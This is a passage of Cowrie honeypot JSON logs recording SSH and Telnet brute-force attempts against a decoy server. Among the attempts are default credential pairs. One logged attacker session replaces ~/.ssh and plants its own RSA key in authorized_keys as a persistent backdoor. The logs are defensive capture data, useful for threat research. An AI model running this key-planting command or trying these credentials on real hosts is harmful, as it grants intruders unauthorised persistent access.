"ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:26:00.492352Z","src_ip":"212.227.235.229","session":"f5baf4eb8298"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:01.545873Z","src_ip":"212.227.235.229","session":"901e8207f00a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:26:02.038574Z","src_ip":"212.227.235.229","session":"f5baf4eb8298"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:02.265445Z","src_ip":"212.227.235.229","session":"f5baf4eb8298"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:02.266373Z","src_ip":"212.227.235.229","session":"83c01fb4465a"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":39922,"dst_ip":"1.2.3.4","dst_port":22,"session":"72e253470b2b","protocol":"ssh","message":"New connection: 134.199.174.250:39922 (1.2.3.4:22) [session: 72e253470b2b]","sensor":"my-vps","timestamp":"2025-09-08T13:26:18.309631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:26:18.310638Z","src_ip":"134.199.174.250","session":"72e253470b2b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:26:18.614409Z","src_ip":"134.199.174.250","session":"72e253470b2b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234567890","message":"login attempt [pi/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:26:19.584049Z","src_ip":"134.199.174.250","session":"72e253470b2b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:20.889958Z","src_ip":"134.199.174.250","session":"72e253470b2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55920,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef02e6907fbc","protocol":"telnet","message":"New connection: 212.227.235.229:55920 (1.2.3.4:23) [session: ef02e6907fbc]","sensor":"my-vps","timestamp":"2025-09-08T13:26:21.193297Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49612,"dst_ip":"1.2.3.4","dst_port":22,"session":"3358ba832f96","protocol":"ssh","message":"New connection: 212.227.235.229:49612 (1.2.3.4:22) [session: 3358ba832f96]","sensor":"my-vps","timestamp":"2025-09-08T13:26:32.261638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:26:32.263113Z","src_ip":"212.227.235.229","session":"3358ba832f96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:26:32.367811Z","src_ip":"212.227.235.229","session":"3358ba832f96"}
{"eventid":"cowrie.login.failed","username":"test","password":"testtest","message":"login attempt [test/testtest] failed","sensor":"my-vps","timestamp":"2025-09-08T13:26:32.872804Z","src_ip":"212.227.235.229","session":"3358ba832f96"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:33.980136Z","src_ip":"212.227.235.229","session":"3358ba832f96"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":41958,"dst_ip":"1.2.3.4","dst_port":23,"session":"2e07e74af6c4","protocol":"telnet","message":"New connection: 176.65.149.186:41958 (1.2.3.4:23) [session: 2e07e74af6c4]","sensor":"my-vps","timestamp":"2025-09-08T13:26:42.287822Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:26:42.325138Z","src_ip":"176.65.149.186","session":"2e07e74af6c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:26:42.372715Z","src_ip":"176.65.149.186","session":"2e07e74af6c4"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T13:26:42.374010Z","src_ip":"176.65.149.186","session":"2e07e74af6c4"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T13:26:42.374826Z","src_ip":"176.65.149.186","session":"2e07e74af6c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46482,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf69eb323e62","protocol":"ssh","message":"New connection: 212.227.235.229:46482 (1.2.3.4:22) [session: bf69eb323e62]","sensor":"my-vps","timestamp":"2025-09-08T13:26:46.361232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:26:46.362375Z","src_ip":"212.227.235.229","session":"bf69eb323e62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:26:46.486357Z","src_ip":"212.227.235.229","session":"bf69eb323e62"}
{"eventid":"cowrie.login.failed","username":"jake","password":"123456789","message":"login attempt [jake/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T13:26:47.023739Z","src_ip":"212.227.235.229","session":"bf69eb323e62"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:48.149397Z","src_ip":"212.227.235.229","session":"bf69eb323e62"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":53294,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7d1b59dbb34","protocol":"ssh","message":"New connection: 134.199.174.250:53294 (1.2.3.4:22) [session: a7d1b59dbb34]","sensor":"my-vps","timestamp":"2025-09-08T13:26:49.627292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:26:49.627974Z","src_ip":"134.199.174.250","session":"a7d1b59dbb34"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:26:49.923088Z","src_ip":"134.199.174.250","session":"a7d1b59dbb34"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":5262,"dst_ip":"1.2.3.4","dst_port":22,"session":"5673ae03c564","protocol":"ssh","message":"New connection: 49.247.35.31:5262 (1.2.3.4:22) [session: 5673ae03c564]","sensor":"my-vps","timestamp":"2025-09-08T13:26:50.253575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:26:50.258894Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:26:50.554123Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.login.failed","username":"pi","password":"password1","message":"login attempt [pi/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:26:51.174787Z","src_ip":"134.199.174.250","session":"a7d1b59dbb34"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1!","message":"login attempt [root/Password1!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:26:51.718958Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:26:52.369667Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:26:52.370497Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:26:52.371660Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:52.602495Z","src_ip":"134.199.174.250","session":"a7d1b59dbb34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:52.656856Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:26:53.252929Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:26:53.253630Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:26:53.557387Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:53.558285Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":59970,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d1627263e87","protocol":"ssh","message":"New connection: 49.247.35.31:59970 (1.2.3.4:22) [session: 2d1627263e87]","sensor":"my-vps","timestamp":"2025-09-08T13:26:53.840055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:26:53.858443Z","src_ip":"49.247.35.31","session":"2d1627263e87"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:26:54.141099Z","src_ip":"49.247.35.31","session":"2d1627263e87"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:26:55.284184Z","src_ip":"49.247.35.31","session":"2d1627263e87"}
{"eventid":"cowrie.session.closed","duration":34.437681913375854,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:55.630914Z","src_ip":"212.227.235.229","session":"ef02e6907fbc"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:56.579174Z","src_ip":"49.247.35.31","session":"2d1627263e87"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":32995,"dst_ip":"1.2.3.4","dst_port":22,"session":"c83df401e66c","protocol":"ssh","message":"New connection: 49.247.35.31:32995 (1.2.3.4:22) [session: c83df401e66c]","sensor":"my-vps","timestamp":"2025-09-08T13:26:56.860908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:26:56.874006Z","src_ip":"49.247.35.31","session":"c83df401e66c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:26:57.156259Z","src_ip":"49.247.35.31","session":"c83df401e66c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:26:58.319338Z","src_ip":"49.247.35.31","session":"c83df401e66c"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:58.618810Z","src_ip":"49.247.35.31","session":"5673ae03c564"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:26:58.620385Z","src_ip":"49.247.35.31","session":"c83df401e66c"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":34260,"dst_ip":"1.2.3.4","dst_port":22,"session":"d025bc676df7","protocol":"ssh","message":"New connection: 134.199.174.250:34260 (1.2.3.4:22) [session: d025bc676df7]","sensor":"my-vps","timestamp":"2025-09-08T13:27:20.631379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:27:20.632399Z","src_ip":"134.199.174.250","session":"d025bc676df7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes1